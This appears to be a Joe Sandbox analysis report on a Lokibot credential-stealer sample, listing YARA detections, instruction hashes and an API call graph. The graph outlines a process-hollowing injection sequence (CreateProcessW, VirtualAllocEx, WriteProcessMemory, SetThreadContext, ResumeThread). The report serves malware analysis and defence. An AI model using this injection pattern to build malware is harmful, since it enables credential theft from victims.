                              • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                              • Rule: Windows_Trojan_Lokibot_1f885282, Description: unknown, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: Windows_Trojan_Lokibot_0f421617, Description: unknown, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                              • Rule: Loki_1, Description: Loki Payload, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: kevoreilly
                              • Rule: Lokibot, Description: detect Lokibot in memory, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                              • Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
Reputation: moderate
Has exited: true


                                Execution Graph

Execution Coverage: 19.6%
Dynamic/Decrypted Code Coverage: 100%
Signature Coverage: 0%
Total number of Nodes: 17
Total number of Limit Nodes: 2
execution_graph (node ID, address, API call; edges as ->):
• 3348 c88f18 VirtualAllocEx -> 3349 c88fcf
• 3350 c889b8 -> 3351 c88a45 CreateProcessW -> 3353 c88bac (3353->3353)
• 3340 c89160 ResumeThread -> 3341 c891e8
• 3342 c88e00 ReadProcessMemory -> 3343 c88ebf
• 3344 c89020 -> 3345 c89089 -> 3346 c8909e WriteProcessMemory -> 3347 c89100 (also 3344->3346)
• 3354 c88cf0 -> 3355 c88d4e -> 3356 c88d63 Wow64SetThreadContext -> 3357 c88dac (also 3354->3356)
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: ab93985123931c72189a9f0cd3d8e4755d7d94e3cbeeaa8cd625e20f58742ca9
                                • Instruction ID: 73ef8b9553e58aed4d8e41fbd7542a281543624a4e1a06c88a4eec12ac9b52ed
                                • Opcode Fuzzy Hash: ab93985123931c72189a9f0cd3d8e4755d7d94e3cbeeaa8cd625e20f58742ca9
                                • Instruction Fuzzy Hash: C6714E74E056298BDB68CF2ACD457DAB7F2AFC9300F20C1EAC50DA7254EB705A858F45
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 8223d5ef40c9cb2adb3dcb66e2705055e045e915c47d652b2b75e8e6dda05c54
                                • Instruction ID: a113cb01a692d219726053a331f62d742806c9ff361cff1ecdce91c7e238facb
                                • Opcode Fuzzy Hash: 8223d5ef40c9cb2adb3dcb66e2705055e045e915c47d652b2b75e8e6dda05c54
                                • Instruction Fuzzy Hash: A8511874D056298FCB68DF25CD857DAB7F2BF89300F2085EA8109A7264EB309F818F45
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e8691a196a6e18d442657f8eb438e9866e2d97b369e8c256fca5199018973c5f
                                • Instruction ID: eb9b377ab36bd5b9e211bc338c90c2d7f6c2726c3a0c266e26779ee9e5a06b71
                                • Opcode Fuzzy Hash: e8691a196a6e18d442657f8eb438e9866e2d97b369e8c256fca5199018973c5f
                                • Instruction Fuzzy Hash: F4510A74D056298FCB68DF25CD857DAB7F2AF89300F2095EA810DA7250EB309F918F55
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 3ab751bf2626573a9237f336e72aaec5ffd30a4d34f5c7ff952d976271cbff6f
                                • Instruction ID: 08d36f50938f37dae6d84fa27a5c66792d0d6e441693dcac9daaa5be870a5ef4
                                • Opcode Fuzzy Hash: 3ab751bf2626573a9237f336e72aaec5ffd30a4d34f5c7ff952d976271cbff6f
                                • Instruction Fuzzy Hash: E8511B74E056298FCB68DF25CD857DAB7F2AF89300F2095EA810DA7254EB309F918F45
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: b3d29e371f467aaae8ff6a5e0ecdeae90c4dfd7742a26e2739347b8ff4206f48
                                • Instruction ID: edde946cb545788dfa98689f73032948b9b2314e62458f5a6d84053879753d5e
                                • Opcode Fuzzy Hash: b3d29e371f467aaae8ff6a5e0ecdeae90c4dfd7742a26e2739347b8ff4206f48
                                • Instruction Fuzzy Hash: F2410974E056198FCBA8DF25CD857DAB7F2AF89300F2095EA810DA7254EB309E918F45
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d68fd051e5cade60e2b2585f1f07d7691c32c58ba4afc3849046b06e466e8d5e
                                • Instruction ID: aa9f38affc79ed44c9560afc4c849c15d24e73c834f39289a441f1747428f1a2
                                • Opcode Fuzzy Hash: d68fd051e5cade60e2b2585f1f07d7691c32c58ba4afc3849046b06e466e8d5e
                                • Instruction Fuzzy Hash: C7410974E056298FCB68DF25CD856CAB7F2AF89300F2085EA810DA7254EB309F918F45

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 46 c8892d-c88930 47 c889ae-c88a43 46->47 48 c88932-c889ad 46->48 50 c88a5a-c88a68 47->50 51 c88a45-c88a57 47->51 48->47 52 c88a6a-c88a7c 50->52 53 c88a7f-c88abb 50->53 51->50 52->53 54 c88abd-c88acc 53->54 55 c88acf-c88baa CreateProcessW 53->55 54->55 59 c88bac-c88bb2 55->59 60 c88bb3-c88c7c 55->60 59->60 69 c88c7e-c88ca7 60->69 70 c88cb2-c88cbd 60->70 69->70 74 c88cbe 70->74 74->74
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C88B97
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 5a6e4bd99cfa022b7fd78bf85823f795b06ed80a76771d4319ece9b4bccba181
                                • Instruction ID: 76af0b899844a147e33340e1ff189cf516970e38a70eaa73c686955a4a5bf7dd
                                • Opcode Fuzzy Hash: 5a6e4bd99cfa022b7fd78bf85823f795b06ed80a76771d4319ece9b4bccba181
                                • Instruction Fuzzy Hash: E5A1F275C402199FEB26DF64C880BDEBBF1AB09304F5094EAD548B7260DB749E85CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 75 c889b8-c88a43 76 c88a5a-c88a68 75->76 77 c88a45-c88a57 75->77 78 c88a6a-c88a7c 76->78 79 c88a7f-c88abb 76->79 77->76 78->79 80 c88abd-c88acc 79->80 81 c88acf-c88baa CreateProcessW 79->81 80->81 85 c88bac-c88bb2 81->85 86 c88bb3-c88c7c 81->86 85->86 95 c88c7e-c88ca7 86->95 96 c88cb2-c88cbd 86->96 95->96 100 c88cbe 96->100 100->100
                                APIs
                                • CreateProcessW.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 00C88B97
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: CreateProcess
                                • String ID:
                                • API String ID: 963392458-0
                                • Opcode ID: 07431d02f1b1811bba21537e2d043259bf9a1f6d77ae91a6e5f6fe5ff8d66525
                                • Instruction ID: 16585431927c715ec14aeae520d8c310f3da4d900d209cbb97ed70515e33360b
                                • Opcode Fuzzy Hash: 07431d02f1b1811bba21537e2d043259bf9a1f6d77ae91a6e5f6fe5ff8d66525
                                • Instruction Fuzzy Hash: EE81AF74D0022DDFDF25DF69C940BDEBBB1AB49304F0494AAE548B7250DB709A89CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 101 c8901e-c89087 102 c89089-c8909b 101->102 103 c8909e-c890fe WriteProcessMemory 101->103 102->103 104 c89100-c89106 103->104 105 c89107-c89145 103->105 104->105
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C890EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: ea41d17998d964a49e53b89bdaa79c2378662c0e71878b616eee2ffec065dd06
                                • Instruction ID: 59bc53fed43e5b38f9414e8af6e0b6f3dd3179ace70323eeb45e32916fb1d4cb
                                • Opcode Fuzzy Hash: ea41d17998d964a49e53b89bdaa79c2378662c0e71878b616eee2ffec065dd06
                                • Instruction Fuzzy Hash: 694199B5D042589FCF10CFA9D984AEEFBF1BB09314F24902AE818B7210D375AA45CF64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 108 c89020-c89087 109 c89089-c8909b 108->109 110 c8909e-c890fe WriteProcessMemory 108->110 109->110 111 c89100-c89106 110->111 112 c89107-c89145 110->112 111->112
                                APIs
                                • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C890EE
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 49de42292263395d0b458a6256bca743c4243149f2aa105b7ed8260d2ab794e2
                                • Instruction ID: 61b04a97a795738cb004c306e3f28d9b1f6c3ebffbfe7a133a81243f015aa6df
                                • Opcode Fuzzy Hash: 49de42292263395d0b458a6256bca743c4243149f2aa105b7ed8260d2ab794e2
                                • Instruction Fuzzy Hash: 204168B5D042599FCF10CFA9D984AEEFBF1BB49314F24902AE818B7210D375AA45CB64

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 115 c88df8-c88ebd ReadProcessMemory 117 c88ebf-c88ec5 115->117 118 c88ec6-c88f04 115->118 117->118
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C88EAD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 75ea86e00a62e5704374c75d283395753c3d25bdb8a0ecad76eae85dbea754dd
                                • Instruction ID: 0ef8b837977ad8c9cee18b7966c9423ab572c99d14003e7086783de3ae408dba
                                • Opcode Fuzzy Hash: 75ea86e00a62e5704374c75d283395753c3d25bdb8a0ecad76eae85dbea754dd
                                • Instruction Fuzzy Hash: 2A3188B9D04259DFCF10CFA9D980ADEFBB1BB19314F14A06AE814B7210D375A945CF68

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 121 c88e00-c88ebd ReadProcessMemory 122 c88ebf-c88ec5 121->122 123 c88ec6-c88f04 121->123 122->123
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 00C88EAD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 2eee9b5687432183f9d24bd7322316db3e8a69866cc1757b60501cebcc0674c1
                                • Instruction ID: 301396799eedce6d3e64f8db26bc0ada13a7c31a75e63938a5d3f57c722470ce
                                • Opcode Fuzzy Hash: 2eee9b5687432183f9d24bd7322316db3e8a69866cc1757b60501cebcc0674c1
                                • Instruction Fuzzy Hash: FF3167B9D04258DFCF10CFAAD984ADEFBB5BB19310F14A06AE814B7210D375A945CF68

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 126 c88f10-c88f12 127 c88f14-c88fcd VirtualAllocEx 126->127 128 c88fcf-c88fd5 127->128 129 c88fd6-c8900c 127->129 128->129
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C88FBD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 68320000ad4f52091024f8307f06c1dcd1d4a405bcb4504ed9888ae0cd1a4802
                                • Instruction ID: cba5c6f30b918990a74cb0a77be892fb392f49b5ae995571582c8c15d63312ba
                                • Opcode Fuzzy Hash: 68320000ad4f52091024f8307f06c1dcd1d4a405bcb4504ed9888ae0cd1a4802
                                • Instruction Fuzzy Hash: 6A3178B9D04258DFCF10CFA9D980A9EFBB1BB59310F14A02AE918B7310D775A905CF68

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 132 c88f18-c88fcd VirtualAllocEx 133 c88fcf-c88fd5 132->133 134 c88fd6-c8900c 132->134 133->134
                                APIs
                                • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 00C88FBD
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: a5753038a0ef58d8a6935adbf28671e0a016900019a1aa72367f8f6cc8139570
                                • Instruction ID: 8a208e7a9656c32c3f0f687dd94b90e74660da704a95455609ea7f31ce62a501
                                • Opcode Fuzzy Hash: a5753038a0ef58d8a6935adbf28671e0a016900019a1aa72367f8f6cc8139570
                                • Instruction Fuzzy Hash: A83157B9D04258DFCF10CFA9D984A9EFBB5BB09310F10A01AE914B7310D775A945CF69

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 137 c88cf0-c88d4c 138 c88d4e-c88d60 137->138 139 c88d63-c88daa Wow64SetThreadContext 137->139 138->139 140 c88dac-c88db2 139->140 141 c88db3-c88deb 139->141 140->141
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C88D9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 65f0b2b344a9a66eb204b0fd1c92270741ddf9eefb296d60d61f8ab95da5c2d6
                                • Instruction ID: 87f06de2ead247c1837fb7e81f0e5a2f4bed528474e614cf07fa55a961834d70
                                • Opcode Fuzzy Hash: 65f0b2b344a9a66eb204b0fd1c92270741ddf9eefb296d60d61f8ab95da5c2d6
                                • Instruction Fuzzy Hash: 1331CCB5D002599FCB10CFAAD584ADEFBF0BB08314F24802AE414B7240C778AA45CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 144 c88ce8-c88d4c 145 c88d4e-c88d60 144->145 146 c88d63-c88daa Wow64SetThreadContext 144->146 145->146 147 c88dac-c88db2 146->147 148 c88db3-c88deb 146->148 147->148
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 00C88D9A
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 4fa7f403c18eb7394f33c3d42b93b9c386aa7509166029c34e3fc89ce6b58ec9
                                • Instruction ID: 405dc93cb9608891934f4e91ef01f54d33d0a9978ad60c9e14b2b753417f77c9
                                • Opcode Fuzzy Hash: 4fa7f403c18eb7394f33c3d42b93b9c386aa7509166029c34e3fc89ce6b58ec9
                                • Instruction Fuzzy Hash: 9E31B9B5D00259DFCB14CFA9D584ADEFBF1BB08314F24906AE818B7250D778AA49CF54

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 151 c89158-c891e6 ResumeThread 154 c891e8-c891ee 151->154 155 c891ef-c8921d 151->155 154->155
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 00C891D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 15e52d198ab22b981294bfc3a9e619e2fa3fc25d1b3f1a60b839e8bdfc037425
                                • Instruction ID: 67c26296cb4e8fc16e3a3542101d9d6c2a4fe20e4700c4afc62bcdbc8d9f5751
                                • Opcode Fuzzy Hash: 15e52d198ab22b981294bfc3a9e619e2fa3fc25d1b3f1a60b839e8bdfc037425
                                • Instruction Fuzzy Hash: 70219AB8D042099FCB10CFA9D484ADEFBF4EB09314F24905AE918B3310D375A941CF68

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 158 c89160-c891e6 ResumeThread 159 c891e8-c891ee 158->159 160 c891ef-c8921d 158->160 159->160
                                APIs
                                • ResumeThread.KERNELBASE(?), ref: 00C891D6
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 4c5d5b210f7d84b24a854026eae8753d2346499221f1beeb26cfd5afb1f77458
                                • Instruction ID: d7549cbccdcb9117e73b363b1e889eb4dd666dbeaa2a1ee4c2e2260c1fda6ad3
                                • Opcode Fuzzy Hash: 4c5d5b210f7d84b24a854026eae8753d2346499221f1beeb26cfd5afb1f77458
                                • Instruction Fuzzy Hash: 912188B9D042199FCB10CFA9D584ADEFBF4EB49324F24905AE818B7310D375A945CFA8
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: dddcee6a96b8d0bb49debb09350c3ef7f4beb76ef6178736d10bb355f8dbad7d
                                • Instruction ID: c9067d8b22ebcc1588d8375d658fe816bdc219d07b0747ebcf8de487dd746345
                                • Opcode Fuzzy Hash: dddcee6a96b8d0bb49debb09350c3ef7f4beb76ef6178736d10bb355f8dbad7d
                                • Instruction Fuzzy Hash: 21613C74E152459FEB48EF7AE840B9ABFF2BBC9300F14C129D004AB369DB785906DB50
                                Memory Dump Source
                                • Source File: 00000000.00000002.2123452616.0000000000C80000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C80000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_c80000_6SQADa3zKv.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: d66794fd017f61062e7fd7ab52840cab96979cd571c722694daa3aed94a24d81
                                • Instruction ID: 90973165a9bc189b863a5fe2c8bc407c411a5a55efc08d0456934d58a164bc3f
                                • Opcode Fuzzy Hash: d66794fd017f61062e7fd7ab52840cab96979cd571c722694daa3aed94a24d81
                                • Instruction Fuzzy Hash: 4B611B74E15649DFEB48EF7AE840B9EBBF2BBC9300F14C129D014AB369DB7859059B40

                                Execution Graph

                                Execution Coverage:31.2%
                                Dynamic/Decrypted Code Coverage:0%
                                Signature Coverage:4.4%
                                Total number of Nodes:1846
                                Total number of Limit Nodes:92
                                execution_graph 9723 40c640 9750 404bee 9723->9750 9726 40c70f 9727 404bee 6 API calls 9728 40c66b 9727->9728 9729 40c708 9728->9729 9731 404bee 6 API calls 9728->9731 9730 402bab 2 API calls 9729->9730 9730->9726 9732 40c683 9731->9732 9733 40c701 9732->9733 9734 404bee 6 API calls 9732->9734 9735 402bab 2 API calls 9733->9735 9738 40c694 9734->9738 9735->9729 9736 40c6f8 9737 402bab 2 API calls 9736->9737 9737->9733 9738->9736 9757 40c522 9738->9757 9740 40c6a9 9741 40c6ef 9740->9741 9743 405872 4 API calls 9740->9743 9742 402bab 2 API calls 9741->9742 9742->9736 9744 40c6c5 9743->9744 9745 405872 4 API calls 9744->9745 9746 40c6d5 9745->9746 9747 405872 4 API calls 9746->9747 9748 40c6e7 9747->9748 9749 402bab 2 API calls 9748->9749 9749->9741 9751 402b7c 2 API calls 9750->9751 9753 404bff 9751->9753 9752 404c3b 9752->9726 9752->9727 9753->9752 9754 4031e5 4 API calls 9753->9754 9755 404c28 9754->9755 9755->9752 9756 402bab 2 API calls 9755->9756 9756->9752 9758 402b7c 2 API calls 9757->9758 9759 40c542 9758->9759 9759->9740 9760 405941 9761 4031e5 4 API calls 9760->9761 9762 405954 9761->9762 8327 409046 8340 413b28 8327->8340 8329 40906d 8331 405b6f 6 API calls 8329->8331 8330 40904e 8330->8329 8332 403fbf 7 API calls 8330->8332 8333 40907c 8331->8333 8332->8329 8334 409092 8333->8334 8344 409408 8333->8344 8336 4090a3 8334->8336 8339 402bab 2 API calls 8334->8339 8338 402bab 2 API calls 8338->8334 8339->8336 8341 413b31 8340->8341 8342 413b38 8340->8342 8343 404056 6 API calls 8341->8343 8342->8330 8343->8342 8345 409413 8344->8345 8346 40908c 8345->8346 8358 409d36 8345->8358 8346->8338 8357 40945c 8464 40a35d 8357->8464 8359 409d43 8358->8359 8360 40a35d 4 API calls 8359->8360 8361 409d55 8360->8361 8362 4031e5 4 API calls 8361->8362 8363 409d8b 8362->8363 8364 4031e5 4 API calls 8363->8364 8365 409dd0 8364->8365 8366 405b6f 6 API calls 8365->8366 8397 409423 8365->8397 8368 409df7 8366->8368 8367 409e1c 8369 4031e5 4 API 
calls 8367->8369 8367->8397 8368->8367 8371 402bab 2 API calls 8368->8371 8370 409e62 8369->8370 8372 4031e5 4 API calls 8370->8372 8371->8367 8373 409e82 8372->8373 8374 4031e5 4 API calls 8373->8374 8375 409ea2 8374->8375 8376 4031e5 4 API calls 8375->8376 8377 409ec2 8376->8377 8378 4031e5 4 API calls 8377->8378 8379 409ee2 8378->8379 8380 4031e5 4 API calls 8379->8380 8381 409f02 8380->8381 8382 4031e5 4 API calls 8381->8382 8383 409f22 8382->8383 8384 4031e5 4 API calls 8383->8384 8387 409f42 8384->8387 8385 40a19b 8386 408b2c 4 API calls 8385->8386 8386->8397 8387->8385 8388 409fa3 8387->8388 8389 405b6f 6 API calls 8388->8389 8388->8397 8390 409fbd 8389->8390 8391 40a02c 8390->8391 8393 402bab 2 API calls 8390->8393 8392 4031e5 4 API calls 8391->8392 8419 40a16d 8391->8419 8394 40a070 8392->8394 8396 409fd7 8393->8396 8399 4031e5 4 API calls 8394->8399 8395 402bab 2 API calls 8395->8397 8398 405b6f 6 API calls 8396->8398 8397->8357 8420 4056bf 8397->8420 8401 409fe5 8398->8401 8400 40a090 8399->8400 8403 4031e5 4 API calls 8400->8403 8401->8391 8402 402bab 2 API calls 8401->8402 8404 409fff 8402->8404 8405 40a0b0 8403->8405 8406 405b6f 6 API calls 8404->8406 8408 4031e5 4 API calls 8405->8408 8407 40a00d 8406->8407 8407->8391 8410 40a021 8407->8410 8409 40a0d0 8408->8409 8411 4031e5 4 API calls 8409->8411 8412 402bab 2 API calls 8410->8412 8413 40a0f0 8411->8413 8412->8397 8414 4031e5 4 API calls 8413->8414 8415 40a110 8414->8415 8416 40a134 8415->8416 8417 4031e5 4 API calls 8415->8417 8416->8419 8474 408b2c 8416->8474 8417->8416 8419->8395 8419->8397 8421 402b7c 2 API calls 8420->8421 8423 4056cd 8421->8423 8422 4056d4 8425 408c4d 8422->8425 8423->8422 8424 402b7c 2 API calls 8423->8424 8424->8422 8426 413ba4 6 API calls 8425->8426 8427 408c5c 8426->8427 8428 408f02 8427->8428 8429 408f3a 8427->8429 8432 40903e 8427->8432 8431 405b6f 6 API calls 8428->8431 8430 405b6f 6 API calls 8429->8430 8446 408f51 8430->8446 8433 408f0c 8431->8433 8448 413aca 
Execution Graph (interactive control-flow graph of 6SQADa3zKv.exe; the rendered graph does not survive text extraction, only the node labels do). Windows API calls resolved at the labelled nodes, by node address:
402b7c GetProcessHeap RtlAllocateHeap; 402bab GetProcessHeap HeapFree; 405872 GetProcessHeap RtlAllocateHeap GetProcessHeap HeapFree; 407908 GetProcessHeap RtlAllocateHeap; 4059d8 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB; 40317b GetPEB; 402c15 GetProcAddress; 402c31 LoadLibraryW; 406441 GetNativeSystemInfo; 403ff8 GetLastError; 404585 GetLastError; 406708 GetLastError; 4066f6 SetLastError; 404a2c RegOpenKeyW; 404a12 RegCloseKey; 403b77 PathFileExistsW; 403bc9 GetFileAttributesW; 403c87 CreateDirectoryW; 403c1a DeleteFileW; 4040d5 CreateFileW; 40414f ReadFile; 403c52 CloseHandle; 404131 VirtualAlloc; 403fb1 VirtualFree; 405937 StrStrW; 406484 Sleep.
402b7c 2 API calls 9826->9828 9827->9799 9829 403802 9828->9829 9830 403832 9829->9830 9832 403809 9829->9832 9831 4036a3 4 API calls 9830->9831 9831->9827 9833 4036a3 4 API calls 9832->9833 9833->9827 8924 410cd1 8929 412093 8924->8929 8927 412093 20 API calls 8928 410cff 8927->8928 8931 4120a5 8929->8931 8950 410cf1 8929->8950 8930 4120b3 8932 404056 6 API calls 8930->8932 8931->8930 8935 412100 8931->8935 8933 4120ba 8932->8933 8934 405b6f 6 API calls 8933->8934 8937 412152 8933->8937 8933->8950 8940 412125 8934->8940 8936 403fbf 7 API calls 8935->8936 8935->8950 8936->8933 8951 403d74 8937->8951 8940->8937 8942 412139 8940->8942 8943 41214d 8940->8943 8941 41218c 8945 402bab 2 API calls 8941->8945 8941->8950 8947 402bab 2 API calls 8942->8947 8946 402bab 2 API calls 8943->8946 8944 402bab 2 API calls 8944->8941 8945->8950 8946->8937 8948 41213e 8947->8948 8949 402bab 2 API calls 8948->8949 8949->8950 8950->8927 8952 403d87 8951->8952 8953 403ea3 8952->8953 8954 405b6f 6 API calls 8952->8954 8955 405b6f 6 API calls 8953->8955 8956 403da3 8954->8956 8957 403eb9 8955->8957 8956->8953 8959 4031e5 4 API calls 8956->8959 8958 4031e5 4 API calls 8957->8958 8965 